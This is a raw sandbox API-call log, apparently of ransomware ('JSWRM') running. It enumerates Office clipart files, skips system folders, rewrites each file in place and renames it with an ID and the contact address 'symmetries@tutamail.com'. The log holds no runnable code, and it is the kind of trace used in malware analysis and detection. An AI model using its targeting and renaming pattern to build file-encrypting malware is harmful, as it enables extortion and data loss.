0x0 [0088.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b30) returned 0x24d210 [0088.075] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9b30, lpOverlapped=0x0) returned 1 [0088.078] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.078] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9b30, lpOverlapped=0x0) returned 1 [0088.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.080] CloseHandle (hObject=0x314) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0088.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0088.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.081] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1484, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0217262.WMF", cAlternateFileName="")) returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2=".") returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="..") returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="...") returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="windows") returned -1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="recovery") returned -1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="perflogs") returned -1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="documents and settings") returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="system volume information") returned -1 [0088.081] lstrcmpiW (lpString1="J0217262.WMF", lpString2="msocache") returned -1 [0088.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217262.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217262.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0088.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217262.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217262.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0088.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.082] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5252) returned 1 [0088.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1480) returned 0x205850 [0088.082] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1480, lpOverlapped=0x0) returned 1 [0088.084] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.084] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1480, lpOverlapped=0x0) returned 1 [0088.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.084] CloseHandle (hObject=0x314) returned 1 [0088.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0088.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0088.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0088.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0088.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.129] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd9a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0217302.WMF", cAlternateFileName="")) returned 1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2=".") returned 1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="..") returned 1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="...") returned 1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="windows") returned -1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="recovery") returned -1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="perflogs") returned -1 [0088.129] lstrcmpiW (lpString1="J0217302.WMF", lpString2="documents and settings") returned 1 [0088.130] lstrcmpiW (lpString1="J0217302.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.130] lstrcmpiW (lpString1="J0217302.WMF", lpString2="system volume information") returned -1 [0088.130] lstrcmpiW (lpString1="J0217302.WMF", lpString2="msocache") returned -1 [0088.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217302.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217302.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217302.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217302.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.130] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3482) returned 1 [0088.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd90) returned 0x23fc98 [0088.131] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd90, lpOverlapped=0x0) returned 1 [0088.132] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.132] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd90, lpOverlapped=0x0) returned 1 [0088.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.133] CloseHandle (hObject=0x314) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0088.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0088.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0088.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.135] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ca8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0217872.WMF", cAlternateFileName="")) returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2=".") returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="..") returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="...") returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="windows") returned -1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="recovery") returned -1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="perflogs") returned -1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="documents and settings") returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="system volume information") returned -1 [0088.135] lstrcmpiW (lpString1="J0217872.WMF", lpString2="msocache") returned -1 [0088.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217872.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217872.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217872.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217872.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0217872.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0217872.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7336) returned 1 [0088.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ca0) returned 0x205850 [0088.136] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ca0, lpOverlapped=0x0) returned 1 [0088.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.138] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ca0, lpOverlapped=0x0) returned 1 [0088.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.138] CloseHandle (hObject=0x314) returned 1 [0088.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0088.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.138] HeapFree (in: 